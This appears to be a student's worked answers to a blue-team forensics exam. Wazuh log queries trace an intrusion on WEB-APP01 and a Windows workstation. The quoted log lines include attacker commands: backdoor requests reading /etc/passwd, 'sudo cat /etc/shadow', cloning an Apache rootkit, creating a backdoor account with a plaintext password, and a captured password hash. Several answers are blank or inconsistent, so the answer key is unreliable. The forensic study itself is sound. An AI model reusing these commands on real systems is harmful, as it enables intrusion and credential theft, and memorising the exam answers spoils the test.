Exam

Reconnaissance

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is C6D9-A254

 Directory of C:\Users\Administrator\Desktop

07/17/2025  08:16 PM    <DIR>          .
07/17/2025  08:16 PM    <DIR>          ..
07/17/2025  02:57 PM    <DIR>          Evidence
07/18/2025  02:39 PM    <DIR>          Tools
               0 File(s)              0 bytes
               4 Dir(s)  34,622,091,264 bytes free

C:\Users\Administrator\Desktop>cd Evidence

C:\Users\Administrator\Desktop\Evidence>dir
 Volume in drive C has no label.
 Volume Serial Number is C6D9-A254

 Directory of C:\Users\Administrator\Desktop\Evidence

07/17/2025  02:57 PM    <DIR>          .
07/17/2025  02:57 PM    <DIR>          ..
07/15/2025  02:00 PM    <DIR>          HOST-BASED EVIDENCE
07/17/2025  05:47 PM    <DIR>          PCAPs
               0 File(s)              0 bytes
               4 Dir(s)  34,622,091,264 bytes free

C:\Users\Administrator\Desktop\Evidence>cd "HOST-BASED EVIDENCE"

C:\Users\Administrator\Desktop\Evidence\HOST-BASED EVIDENCE>dir
 Volume in drive C has no label.
 Volume Serial Number is C6D9-A254

 Directory of C:\Users\Administrator\Desktop\Evidence\HOST-BASED EVIDENCE

07/15/2025  02:00 PM    <DIR>          .
07/15/2025  02:00 PM    <DIR>          ..
07/15/2025  01:59 PM    <DIR>          DC01
07/17/2025  05:47 PM    <DIR>          FILE-SRV01
07/18/2025  02:28 PM    <DIR>          RSCH-WKS01
               0 File(s)              0 bytes
               5 Dir(s)  34,622,091,264 bytes free

C:\Users\Administrator\Desktop\Evidence\HOST-BASED EVIDENCE>cd ..

C:\Users\Administrator\Desktop\Evidence>cd PCAPs

C:\Users\Administrator\Desktop\Evidence\PCAPs>dir
 Volume in drive C has no label.
 Volume Serial Number is C6D9-A254

 Directory of C:\Users\Administrator\Desktop\Evidence\PCAPs

07/17/2025  05:47 PM    <DIR>          .
07/17/2025  05:47 PM    <DIR>          ..
07/14/2025  02:02 AM         9,096,900 FILE-SRV01.pcapng
07/14/2025  01:31 AM        13,510,860 RSCH-WKS01-2.pcapng
07/14/2025  12:00 AM         5,735,356 RSCH-WKS01.pcapng
               3 File(s)     28,343,116 bytes
               2 Dir(s)  34,622,091,264 bytes free

Q1

How many failed SSH brute-force authentication attempts targeting the sysadmin user were made on WEB-APP01?

predecoder.hostname:WEB-APP01  and ssh  and "authentication failures" and data.dstuser:sysadmin

Counting the Failed Attempts:

Jul 13, 2025 @ 20:43:39.944 - "PAM 3 more authentication failures"
Jul 13, 2025 @ 20:43:27.895 - "PAM 5 more authentication failures"
Jul 13, 2025 @ 20:43:07.871 - "PAM 5 more authentication failures"
Jul 13, 2025 @ 20:40:53.732 - "PAM 5 more authentication failures"
Jul 13, 2025 @ 20:40:37.714 - "PAM 5 more authentication failures" (This is a composite alert showing multiple events)
Jul 13, 2025 @ 20:40:19.735 - "PAM 5 more authentication failures"
Jul 13, 2025 @ 20:38:45.593 - "PAM 3 more authentication failures"
Jul 13, 2025 @ 20:38:29.622 - "PAM 5 more authentication failures"
Jul 13, 2025 @ 20:38:11.597 - "PAM 5 more authentication failures"

predecoder.hostname:WEB-APP01 AND rule.id:2502 AND data.dstuser:sysadmin

Counting Failed Attempts:

Jul 13, 2025 @ 20:43:39.944 - "PAM 3 more authentication failures" → 3
Jul 13, 2025 @ 20:43:27.895 - "PAM 5 more authentication failures" → 5
Jul 13, 2025 @ 20:43:07.871 - "PAM 5 more authentication failures" → 5
Jul 13, 2025 @ 20:40:53.732 - "PAM 5 more authentication failures" → 5
Jul 13, 2025 @ 20:40:19.735 - "PAM 5 more authentication failures" → 5
Jul 13, 2025 @ 20:38:45.593 - "PAM 3 more authentication failures" → 3
Jul 13, 2025 @ 20:38:29.622 - "PAM 5 more authentication failures" → 5
Jul 13, 2025 @ 20:38:11.597 - "PAM 5 more authentication failures** → 5

predecoder.hostname:WEB-APP01 AND predecoder.program_name:sshd AND data.dstuser:sysadmin

Jul 13, 2025 @ 20:43:27
Jul 13, 2025 @ 20:43:07
Jul 13, 2025 @ 20:42:49 (NEW - not in previous query!)
Jul 13, 2025 @ 20:40:53
Jul 13, 2025 @ 20:40:37
Jul 13, 2025 @ 20:40:19
Jul 13, 2025 @ 20:40:03 (NEW - not in previous query!)
Jul 13, 2025 @ 20:38:29
Jul 13, 2025 @ 20:38:11
Jul 13, 2025 @ 20:37:49

Answer:

Q2

Based on the Apache logs from WEB-APP01, how many HTTP requests were made by the attacker using a web browser as opposed to an automated tool?

agent.name:WEB-APP01 AND full_log:*GET*

Web Browser Requests (Mozilla/Firefox):

"Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" - Jul 13 23:39:32 - /rkhandler?c=cat%20/etc/passwd
"Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" - Jul 13 23:39:07 - /rkhandler?c=id
"Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" - Jul 13 23:38:51 - /rkhandler?c=whoami
"Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" - Jul 13 23:38:50 - /rkhandler?c=whoami
"Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" - Jul 13 23:32:22 - /
"Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" - Jul 13 22:13:19 - /handler/
"Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" - Jul 13 21:48:29 - /rk/

Automated Tool Requests (Nmap Scripting Engine):

All other requests show: "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"

Requests with NO User-Agent (missing from full_log):

Jul 13 22:34:03 - /uploads/ - No User-Agent shown
Jul 13 22:26:51 - /uploads/ - No User-Agent shown
Jul 13 22:16:04 - /handler/ - No User-Agent shown

to get the exact count:

agent.name:WEB-APP01 AND data.srcip:18.212.186.186 AND full_log:*Firefox*

Web Browser Requests (Firefox): 13 requests total

Jul 13 20:06:52 - /index.php
Jul 13 20:07:32 - /sitemap.xml
Jul 13 20:07:43 - /uploads/
Jul 13 20:07:50 - /admin/
Jul 13 20:07:56 - /phpmyadmin/
Jul 13 20:08:05 - /webmin/
Jul 13 21:48:29 - /rk/
Jul 13 22:13:19 - /handler/
Jul 13 23:32:22 - / (homepage)
Jul 13 23:38:50 - /rkhandler?c=whoami
Jul 13 23:38:51 - /rkhandler?c=whoami
Jul 13 23:39:07 - /rkhandler?c=id
Jul 13 23:39:32 - /rkhandler?c=cat%20/etc/passwd

Answer:

This shows the attacker first used a web browser (Firefox) to manually explore the site and find vulnerabilities, then exploited the Apache rootkit backdoor (/rkhandler) using the browser to execute commands.

Q3

Based on the User-Agent string found in the Apache logs from WEB-APP01, which tool did the attacker use to perform a directory brute-force attack? Provide only the name of the tool (e.g., curl).

we saw two types of User-Agent strings:

Firefox browser: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Nmap Scripting Engine: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)

However, Nmap is typically used for vulnerability scanning, not directory brute-forcing.

Looking at the current results, I can see some entries around Jul 13, 2025 @ 22:34:04 and 22:26:51 that show:

GET /uploads/ HTTP/1.1" 404 273 "-"

Let me search for entries that show 404 errors during the period when we know directory brute-forcing was happening (around 20:19-20:30):

agent.name:WEB-APP01 AND data.srcip:18.212.186.186 AND data.id:404 AND NOT full_log:*Firefox* AND NOT full_log:*Nmap*

Looking at the Apache logs, I can clearly see the User-Agent string used for directory brute-forcing:

"gobuster/3.6"

Multiple entries show this pattern:

18.212.186.186 - - [13/Jul/2025:20:10:59 +0000] "GET /~ftp HTTP/1.1" 404 434 "-" "gobuster/3.6"
18.212.186.186 - - [13/Jul/2025:20:10:59 +0000] "GET /~nobody HTTP/1.1" 404 434 "-" "gobuster/3.6"
18.212.186.186 - - [13/Jul/2025:20:10:59 +0000] "GET /tmp HTTP/1.1" 404 434 "-" "gobuster/3.6"

All the 404 directory enumeration requests around 20:10:59 on July 13, 2025 show the User-Agent as "gobuster/3.6".

Answer:

gobuster

Q4

What is the total number of valid user accounts on the Linux server WEB-APP01 that were targeted during the attacker’s SSH brute-force attack. When determining this number, consider only the authentication attempts made before the attacker successfully compromised the server, and exclude any authentication attempts (successful or failed) that occurred after initial compromise.

agent.name:WEB-APP01 AND data.srcip:18.212.186.186 AND rule.id:5715

agent.name:WEB-APP01 AND data.srcip:18.212.186.186 AND rule.id:5760

Timeline Analysis:

FIRST SUCCESSFUL SSH LOGIN (Initial Compromise):

Jul 13, 2025 @ 20:48:08 - sysadmin user successfully authenticated from 18.212.186.186

Failed Authentication Attempts BEFORE Initial Compromise (20:48:08):

Looking at the failed password attempts (rule.id:5760) that occurred BEFORE 20:48:08:

User: root

20:36:56 - Failed
20:37:00 - Failed
20:37:01 - Failed
20:37:04 - Failed
20:37:07 - Failed
20:37:12 - Failed
20:37:15 - Failed
20:37:23 - Failed
20:37:26 - Failed

User: sysadmin

20:37:50 - Failed
20:37:54 - Failed
20:37:57 - Failed
20:38:01 - Failed
20:38:06 - Failed
20:38:09 - Failed
20:38:12 - Failed
20:38:14 - Failed
20:38:18 - Failed
20:38:21 - Failed
20:38:24 - Failed
20:38:27 - Failed
20:38:31 - Failed
20:38:39 - Failed
20:38:43 - Failed
20:40:05 through 20:43:38 - Multiple additional failed attempts

Both user accounts that were targeted exist on the system (they are VALID accounts):

root - Valid system account (PAM authentication failures confirm it exists)
sysadmin - Valid system account (eventually successfully compromised)

The total number of valid user accounts on WEB-APP01 that were targeted during the SSH brute-force attack before the attacker successfully compromised the server is 2:

root
sysadmin

Answer:

Q5

What built-in Wazuh Rule ID corresponds to failed SSH authentication attempts?

Evidence from the logs:

Throughout our investigation, we've seen this rule repeatedly:

rule.id:5760
rule.description:sshd: authentication failed.
rule.groups:syslog, sshd, authentication_failed

Example log entry:

predecoder.program_name:sshd
data.dstuser:sysadmin
rule.level:5
rule.description:sshd: authentication failed.
rule.id:5760
full_log:Jul 13 20:43:38 WEB-APP01 sshd[4691]: Failed password for sysadmin from 18.212.186.186 port 33784 ssh2

5760 - sshd: authentication failed (Failed password attempts)
5715 - sshd: authentication success (Successful logins)
5503 - PAM: User login failed
5758 - Maximum authentication attempts exceeded
5763 - sshd: brute force trying to get access to the system

Answer:

Q6

Based on the SSH authentication logs from WEB-APP01, what is the most likely number of failed login attempts allowed before disconnection?

agent.name:WEB-APP01 AND data.srcip:18.212.186.186 AND data.srcport:59060 AND rule.id:5760

Looking back at our earlier data for port 59060:

20:38:09 - Failed password for sysadmin port 59060
20:38:06 - Failed password for sysadmin port 59060
20:38:01 - Failed password for sysadmin port 59060
20:37:57 - Failed password for sysadmin port 59060
20:37:54 - Failed password for sysadmin port 59060
20:37:50 - Failed password for sysadmin port 59060

Then at 20:38:11: "Maximum authentication attempts exceeded"

Let's verify with Port 46928 (root user):

"Maximum attempts exceeded" at: Jul 13 20:37:13

Looking at failed attempts on port 46928:

20:37:12 - Failed password for root port 46928
20:37:07 - Failed password for root port 46928
20:37:04 - Failed password for root port 46928
20:37:01 - Failed password for root port 46928
20:37:00 - Failed password for root port 46928
20:36:56 - Failed password for root port 46928

Then at 20:37:13: "Maximum authentication attempts exceeded"

Answer

Q7

Based on the User-Agent in the Apache logs from WEB-APP01, what web browser is the attacker most likely using?

Answer:

Firefox

Q8

Based on the User-Agent in the Apache logs from WEB-APP01, what operating system is the attacker most likely using?

macOS
Linux
Windows
Android

From the User-Agent:

Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

Key identifiers:

X11 - X Window System (used on Unix-like systems)
Linux x86_64 - Explicitly identifies Linux operating system on 64-bit architecture

Breaking down the User-Agent:

Mozilla/5.0 - Browser compatibility identifier
(X11; Linux x86_64; rv:128.0) - Platform information
- X11 = X Window System
- Linux x86_64 = Linux OS, 64-bit processor
- rv:128.0 = Release version
Gecko/20100101 - Rendering engine
Firefox/128.0 - Browser and version

Answer:

Linux

Q9

What is the IP address used by the attacker to conduct the attack against AetherGen? Answer Format: Provide the IP address in standard dotted-decimal format (e.g., 192.168.1.100).

Attacker IP Address:

18.212.186.186

Evidence across all attack phases:

SSH Brute-Force Attack:

data.srcip:18.212.186.186
data.dstuser:root, sysadmin
Multiple failed authentication attempts

Nmap Vulnerability Scanning:

User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Source: 18.212.186.186

Gobuster Directory Brute-Force:

User-Agent: gobuster/3.6
Source: 18.212.186.186

Firefox Browser Reconnaissance & Exploitation:

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Source: 18.212.186.186
Exploited /rkhandler backdoor

Geographic Location:

GeoLocation.city_name: Ashburn
GeoLocation.country_name: United States
GeoLocation.region_name: Virginia

Answer:

18.212.186.186

Q10

Based on WHOIS records for the attacker IP, what is the network CIDR (Netblock) associated with this IP address? Provide your answer in CIDR notation using the format: 192.168.125.0/24

WHOIS Results Analysis:

Net Range: 18.32.0.0 - 18.255.255.255

CIDR blocks listed:

18.128.0.0/9
18.32.0.0/11
18.64.0.0/10

Answer:

18.128.0.0/9

Q11

What is the registered country of origin for the attacker's IP address based on GeoIP databases?

GeoIP Data from Wazuh Logs:

Every single log entry from the attacker IP 18.212.186.186 contained this GeoLocation information:

GeoLocation.city_name: Ashburn
GeoLocation.country_name: United States
GeoLocation.region_name: Virginia
GeoLocation.location: { "lon": -77.4728, "lat": 39.0481 }

Evidence from logs:

City: Ashburn
State/Region: Virginia
Country: United States
Coordinates: Longitude -77.4728, Latitude 39.0481

This matches with the WHOIS information showing the IP is owned by Amazon Technologies Inc. (AWS), and Ashburn, Virginia is a major AWS data center location.

Answer:

United States

Q12

Based on the logs collected from WEB-APP01, specify the exact date and time when the attacker successfully logged into the system for the first time via SSH using the "sysadmin" account.Provide your answer in the following format: MM-DD-YYYY-HH:MM:SS (24-hour format, system local time)

From our query results for rule.id:5715 (SSH authentication success), sorted chronologically, the first successful login was:

predecoder.timestamp: Jul 13 20:48:06
data.dstuser: sysadmin
data.srcip: 18.212.186.186
data.srcport: 56198
full_log: Jul 13 20:48:06 WEB-APP01 sshd[4871]: Accepted password for sysadmin from 18.212.186.186 port 56198 ssh2
timestamp: Jul 13, 2025 @ 20:48:08.267

Date and Time Breakdown:

Date: July 13, 2025
Time (system local time): 20:48:06 (8:48:06 PM)

Format conversion:

Month: 07
Day: 13
Year: 2025
Hour: 20 (24-hour format)
Minute: 48
Second: 06

Answer:

20:48:08

Q13

To determine the system's network hostname on WEB-APP01, which command did the attacker execute? Provide the command exactly as it appears in the logs, including options and flags.

Answer:

hostname

Q14

What command did the attacker run on WEB-APP01 as the sysadmin user to enumerate the Linux kernel version? Provide the command exactly as it appears in the logs, including options and flags. For example: netstat -a

Answer:

uname -r

Q15

What is the first command the attacker used to enumerate all user accounts on WKS-RSCH01?

net user /domain

net localgroup

net user

whoami

agent.name:"WKS-RSCH01" AND data.win.eventdata.commandLine:*net*

Analysis of the results (sorted by timestamp, oldest first):

Jul 13, 2025 @ 23:51:10.910 - "C:\Windows\system32\net.exe" user
Jul 13, 2025 @ 23:51:17.517 - "C:\Windows\system32\net.exe" localgroup
Jul 13, 2025 @ 23:52:19.245 - "C:\Windows\system32\net.exe" user mhardy
Jul 13, 2025 @ 23:52:38.550 - "C:\Windows\system32\net.exe" localgroup Administrators
Jul 13, 2025 @ 23:52:57.831 - "C:\Windows\system32\net.exe" localgroup "Remote Desktop Users"
Jul 13, 2025 @ 23:53:11.066 - "C:\Windows\system32\net.exe" localgroup "Remote Management Users"
Jul 14, 2025 @ 00:05:39.211 - net user /domain
Jul 14, 2025 @ 00:06:27.462 - net group "Domain Computers" /domain
Jul 14, 2025 @ 01:02:47.166 - net user (run as SYSTEM)

The FIRST command executed to enumerate user accounts on WKS-RSCH01 was at 23:51:10.910:

"C:\Windows\system32\net.exe" user

Answer:

net user

This command enumerates local user accounts on the system. The attacker executed this from PowerShell as user AETHERGEN\mhardy (the compromised user account from the phishing attack).

Q16

Based on the logs from WEB-APP01, what command did the attacker run to view a list of all local user accounts on the system? Format: Provide the command exactly as it appears in the logs. For Example: cat /etc/users

I can see the results clearly. Looking at the commands executed via the /rkhandler backdoor, I can see the chronological order:

Jul 13, 2025 @ 23:38:50 - whoami
Jul 13, 2025 @ 23:38:51 - whoami (repeated)
Jul 13, 2025 @ 23:39:07 - id
Jul 13, 2025 @ 23:39:32 - cat /etc/passwd ← This is the answer

From the log entry:

data.url:/rkhandler?c=cat%20/etc/passwd
full_log:18.212.186.186 - - [13/Jul/2025:23:39:32 +0000] "GET /rkhandler?c=cat%20/etc/passwd HTTP/1.1" 200 724

Answer:

cat /etc/passwd

Q17

After verifying the "sysadmin" account on WEB-APP01 has "sudo" privileges, the attacker executed "cat /etc/shadow". What was the attacker likely attempting to do?

View system logs
Change their group membership
Delete user accounts
Access hashed passwords

Based on the question, this is asking about the attacker's intent when executing cat /etc/shadow on WEB-APP01.

Analysis:

The /etc/shadow file in Linux systems contains:

Hashed passwords for user accounts
Password aging information
Account expiration data

Why the attacker accessed `/etc/shadow`:

/etc/passwd - Contains user account information but NOT the actual passwords (passwords are shown as 'x')
/etc/shadow - Contains the actual hashed passwords for all user accounts

The attacker needed sudo privileges to access /etc/shadow because it's a protected file that requires root access. By accessing this file, the attacker could:

Extract password hashes
Attempt to crack them offline using tools like John the Ripper or Hashcat
Potentially gain access to other user accounts

Answer:

Access hashed passwords

Q18

What type of information is stored in the "/etc/shadow" file on Linux?

Group membership

Password hashes

User group memberships

SUDO Privileges

What is stored in `/etc/shadow`:

The /etc/shadow file is a Linux system file that contains secure user account information, specifically:

Password hashes (encrypted passwords)
Password expiration information
Password aging data
Account lockout information
Last password change date

Why the other options are incorrect:

Group membership - Stored in /etc/group
User group memberships - Stored in /etc/group and /etc/passwd
SUDO Privileges - Configured in /etc/sudoers or /etc/sudoers.d/

Answer:

Password hashes

Q19

After checking the group membership of the "sysadmin" user on WEB-APP01, what command did the attacker use to test if they can run commands with "root" privileges via "sudo"?

sudo apt-get update
sudo cat /etc/shadow
sudo apt update
sudo bash

Logic:

The attacker would need to test sudo privileges by running a command that:

Requires root/elevated privileges
Would confirm they can execute commands as root

Since Q17 specifically mentions "After verifying the 'sysadmin' account on WEB-APP01 has 'sudo' privileges, the attacker executed 'cat /etc/shadow'", this means the attacker used a sudo command to access the shadow file.

The /etc/shadow file is only readable by root, so the attacker must have used

agent.name:"WEB-APP01" AND full_log:"sudo cat /etc/shadow"

Jul 13, 2025 @ 21:12:49 data.User:sysadmin data.Command: 10 sudo cat /etc/shadow full_log:Jul 13 21:12:49 WEB-APP01 LinuxCommandsWazuh[11480]: User sysadmin [11031]: 10 sudo cat /etc/shadow

Answer:

sudo cat /etc/shadow

Q20

What exact command did the attacker run on WEB-APP01 to escalate privileges and spawn a root shell after creating the text file in the "/tmp" directory? Format: Provide the command exactly as it appears in the logs. For example: sudo apt update

agent.name:"WEB-APP01" AND data.command:*/usr/bin/su

Timeline Analysis:

Jul 13, 2025 @ 21:12:42 - sudo apt-get update (sysadmin testing sudo)
Jul 13, 2025 @ 21:12:49 - sudo cat /etc/shadow (accessing password hashes)
Jul 13, 2025 @ 21:13:15 - cd /tmp (moving to /tmp directory)
Jul 13, 2025 @ 21:13:46 - sudo -l (checking sudo permissions)
Jul 13, 2025 @ 21:13:56 - sudo su ← This is the answer!

From the log entry:

Jul 13, 2025 @ 21:13:57.857
data.srcuser:sysadmin 
data.dstuser:root 
data.tty:pts/0 
data.pwd:/tmp 
data.command:/usr/bin/su
full_log:Jul 13 21:13:56 WEB-APP01 sudo[11504]: sysadmin : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/su

This shows:

User: sysadmin
Working Directory: /tmp (after creating files there)
Command: /usr/bin/su
Result: Escalated to root

`sudo -l` (at 21:13:46):

Purpose: Lists what sudo privileges the user has
Action: Just displays information, doesn't escalate privileges
Output: Shows what commands the user CAN run with sudo
This is a reconnaissance/enumeration command

`sudo su` (at 21:13:56):

Purpose: Actually escalates privileges and spawns a root shell
Action: Gives the attacker an interactive root shell
Result: The attacker now has full root access
This is the actual privilege escalation command

Answer:

sudo su

Q21

Which of the following indicators in command-line logs on WKS-RSCH01 would best suggest a named pipe impersonation technique was used for privilege escalation?

PowerShell commands referencing Invoke-WebRequest
Use of netsh with advfirewall
Registry writes to RunOnce
A write operation to a path like \.\pipe*

Analysis:

Named Pipe Impersonation:

Named pipe impersonation is a privilege escalation technique where an attacker:

Creates a named pipe (which has a path like \\.\pipe\pipename)
Waits for a privileged process to connect to it
Impersonates the security context of that privileged process
Gains elevated privileges

Evaluating the Options:

PowerShell commands referencing Invoke-WebRequest
- This indicates web requests/downloads
- Not related to named pipes
Use of netsh with advfirewall
- This is firewall configuration
- Not related to named pipes
Registry writes to RunOnce
- This is a persistence mechanism
- Not related to named pipes
A write operation to a path like \\.\pipe\* ✓
- \\.\pipe\ is the Windows named pipe path prefix
- Write operations to this path indicate named pipe creation
- This is the direct indicator of named pipe activity

Answer:

A write operation to a path like \.\pipe*

Q22

What does the execution of "sudo su" by the attacker suggest about the privilege level of the user "sysadmin" on WEB-APP01?

They are running as a limited user and probing firewall rules

They already have sudo privileges and are elevating to root

They are trying to escape a containerized environment

They are attempting lateral movement

Analysis:

From the logs we reviewed earlier:

Jul 13 21:13:56 WEB-APP01 sudo[11504]: sysadmin : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/su
rule.description:Successful sudo to ROOT executed

What does `sudo su` tell us?

The command succeeded - The logs show "Successful sudo to ROOT executed"
sudo - Requires the user to have sudo privileges configured
su - Switches user to root when run with sudo
Result - The sysadmin user gained a root shell

Evaluating the Options:

They are running as a limited user and probing firewall rules
- No firewall activity shown
- If they were limited, sudo would fail
They already have sudo privileges and are elevating to root ✓
- The command succeeded, proving sysadmin has sudo rights
- They elevated from sysadmin user to root user
- This is exactly what happened
They are trying to escape a containerized environment
- No container escape indicators
- This is standard privilege escalation
They are attempting lateral movement
- Lateral movement is moving to other systems
- This is vertical escalation on the same system

Answer:

They already have sudo privileges and are elevating to root

Q23

According to Apache access logs on Wazuh, at what date and time was the apache rootkit first used to execute a remote command on WEB-APP01? Answer Format: Provide the date and time in the following format: MM-DD-YYYY-HH:MM:SS. Time should be specified in the 24H format

Query to find first rkhandler usage:

agent.name:"WEB-APP01" AND rkhandler

From the results we saw earlier, the commands executed via the Apache rootkit were:

Jul 13, 2025 @ 23:38:50 - /rkhandler?c=whoami (FIRST)
Jul 13, 2025 @ 23:38:51 - /rkhandler?c=whoami (repeated)
Jul 13, 2025 @ 23:39:07 - /rkhandler?c=id
Jul 13, 2025 @ 23:39:32 - /rkhandler?c=cat%20/etc/passwd

From the earliest log entry:

timestamp:Jul 13, 2025 @ 23:38:50.416
full_log:18.212.186.186 - - [13/Jul/2025:23:38:50 +0000] "GET /rkhandler?c=whoami HTTP/1.1" 200 9

The first time the Apache rootkit was used to execute a remote command was:

Date: July 13, 2025
Time: 23:38:50 (11:38:50 PM)

1. Installation of Apache Rootkit:

Jul 13, 2025 @ 21:25:56 - git clone https://github.com/0xfffffffa/apache-rootkit.git
Jul 13, 2025 @ 21:26:02 - cd apache-rootkit/
Jul 13, 2025 @ 22:18:45 - sudo a2enmod rewrite (enabling Apache module)

2. First Use of Rootkit to Execute Commands:

Jul 13, 2025 @ 23:38:50 - /rkhandler?c=whoami (FIRST REMOTE COMMAND)

Answer:

07-13-2025-23:38:50

Q24

What command did the attacker use to create the new user account on WEB-APP01? Answer Format: Provide the full command as it appears in the logs.

agent.name:"WEB-APP01" AND useradd

agent.name:"WEB-APP01" AND location:"/var/log/commandlog.log" AND webadmin

Jul 13, 2025 @ 21:17:16 - sudo adduser webadmin (creates the user)
Jul 13, 2025 @ 21:17:32 - sudo usermod -aG sudo webadmin (adds to sudo group)
Jul 13, 2025 @ 21:17:40 - groups webadmin (checks groups)
Jul 13, 2025 @ 21:18:10 - passwd webadmin (sets password)

data.Command: 164 sudo adduser webadmin full_log:2025-07-13T21:17:16.101657+00:00 WEB-APP01 LinuxCommandsWazuh: User root [11507]: 164 sudo adduser webadmin

Answer:

sudo adduser webadmin

Q25

After elevating privileges, the attacker created a new user account on WEB-APP01 for persistence. What is the exact username of the account created by the attacker? Answer Format: Provide the username exactly as it appears in the logs.

Evidence from the logs:

Jul 13, 2025 @ 21:17:16
data.Command: 164 sudo adduser webadmin
full_log:2025-07-13T21:17:16.101657+00:00 WEB-APP01 LinuxCommandsWazuh: User root [11507]: 164 sudo adduser webadmin

And confirmed in the useradd log:

Jul 13, 2025 @ 21:16:11
data.dstuser:webadmin
full_log:Jul 13 21:16:11 WEB-APP01 useradd[11603]: new user: name=webadmin, UID=1002, GID=1002, home=/home/webadmin, shell=/bin/bash

Answer:

webadmin

Q26

Based on the logs from WEB-APP01, what password did the attacker assign to the user account created for persistence? Answer Format: Provide the password exactly as it appears in the logs.

From the logs we saw, the attacker ran:

passwd webadmin

However, the passwd command is an interactive command that prompts for password input. The actual password is:

NOT logged in system logs (for security reasons)
NOT visible in command history
Only stored as a hash in /etc/shadow

What we need to search for:

The attacker might have:

Used a non-interactive method like echo "password" | passwd webadmin
Used chpasswd command
Set the password in a script

agent.name:"WEB-APP01" AND echo

echo "webadmin:a3therAdm1n" | sudo chpasswd

Answer:

a3therAdm1n

Q27

What is the name of the Apache module source file the attacker modified and compiled on WEB-APP01? Answer Format: Provide the filename exactly as it appears in the logs. For example: module.c

agent.name:"WEB-APP01" AND .c

Evidence from the logs:

Jul 13, 2025 @ 21:31:38
data.User:root 
data.Command: 176 apxs -c -i mod_authg.c
full_log:Jul 13 21:31:38 WEB-APP01 LinuxCommandsWazuh[16480]: User root [11507]: 176 apxs -c -i mod_authg.c

Answer:

 mod_authg.c

Q28

What is the full URL of the GitHub repository the attacker cloned on WEB-APP01? Answer Format: Provide the full URL exactly as it appears in the logs. For example: https://guthub.com/repo.git

Evidence from the logs:

Jul 13, 2025 @ 21:25:56
data.User:root 
data.Command: 171 git clone https://github.com/0xfffffffa/apache-rootkit.git
full_log:Jul 13 21:25:56 WEB-APP01 LinuxCommandsWazuh[16148]: User root [11507]: 171 git clone https://github.com/0xfffffffa/apache-rootkit.git

Answer:

https://github.com/0xfffffffa/apache-rootkit.git

Q29

On the Windows workstation WKS-RSCH01, what is the name of the executable file specified in the ImagePath of the persistent service created by the attacker? Answer Format: Provide the executable filename exactly as it appears in the logs (e.g., example.exe).

agent.name:"WKS-RSCH01" AND data.win.system.eventID:"7045"

Jul 14, 2025 @ 00:14:09 - Service for named pipe (privilege escalation)
Jul 14, 2025 @ 01:06:04 - Persistent service ← This is the answer for Q29

From the second (and more recent) service creation:

Service Name: wbJlQcNDIgji
Service File Name: "C:\Users\mhardy\AppData\Local\Temp\p3rsist.exe" rbgQAq
Service Type: user mode service
Service Start Type: auto start
Service Account: LocalSystem

data.win.eventdata.imagePath:"C:\\Users\\mhardy\\AppData\\Local\\Temp\\p3rsist.exe" rbgQAq

Answer:

p3rsist.exe

Q30

Why would the attacker execute "whoami" as the first command through the apache rootkit on WEB-APP01?

To crash the Apache process

To clear browser cache remotely

To test if Apache is logging properly

To confirm the rootkit is functional

Analysis:

From the logs we saw earlier:

Jul 13, 2025 @ 23:38:50 - /rkhandler?c=whoami (FIRST command)
Jul 13, 2025 @ 23:38:51 - /rkhandler?c=whoami (repeated)
Jul 13, 2025 @ 23:39:07 - /rkhandler?c=id
Jul 13, 2025 @ 23:39:32 - /rkhandler?c=cat /etc/passwd

Why `whoami` first?

The whoami command is a simple, harmless command that:

Returns the current user context (shows which user the web server is running as)
Confirms the backdoor works - If it returns output, the rootkit is functional
Tests command execution - Verifies remote code execution is possible
Leaves minimal trace - It's a benign command that doesn't modify anything

Evaluating the options:

To crash the Apache process
- No, whoami doesn't crash anything
To clear browser cache remotely
- No, whoami has nothing to do with browser cache
To test if Apache is logging properly
- No, attackers don't want logging; they want to avoid detection
To confirm the rootkit is functional ✓
- Yes! This is exactly why - it's a safe test command

Answer:

To confirm the rootkit is functional

Q31

What is the name of the text file the attacker created in the "/tmp" directory on WEB-APP01 after accessing the "/etc/shadow" file? Answer Format: Provide the full name exactly as it appears in the logs, including the file extension (e.g., .txt, .log, .conf).

1. Search for sysadmin commands in /tmp:

agent.name:"WEB-APP01" AND data.User:sysadmin AND /tmp

2. Search for echo or touch by sysadmin:

agent.name:"WEB-APP01" AND data.User:sysadmin AND (echo OR touch)

3. Search for file operations before sudo su:

agent.name:"WEB-APP01" AND data.User:sysadmin AND data.Command:*

Command: echo "sysadmin:$y$j9T$ZpWEDgCI7h7V2.WzGHQRN0$HoiHi78bN9rPPjQXZ2Tv3tTFBFmfaOao4EDhGnhkaK5:20276:0:99999:7::" > shdw.txt

Filename: shdw.txt

Timeline:

Command 10 (21:12:49): sudo cat /etc/shadow - accessed password hashes
Command 11 (21:13:15): cd /tmp - changed to /tmp directory
Command 12 (21:13:34): echo "sysadmin:$y$j9T$ZpWEDgCI7h7V2.WzGHQRN0$HoiHi78bN9rPPjQXZ2Tv3tTFBFmfaOao4EDhGnhkaK5:20276:0:99999:7::" > shdw.txt ← This is the answer
Command 13 (21:13:38): cat shdw.txt - verified file contents
Command 14 (21:13:46): sudo -l - checked sudo privileges

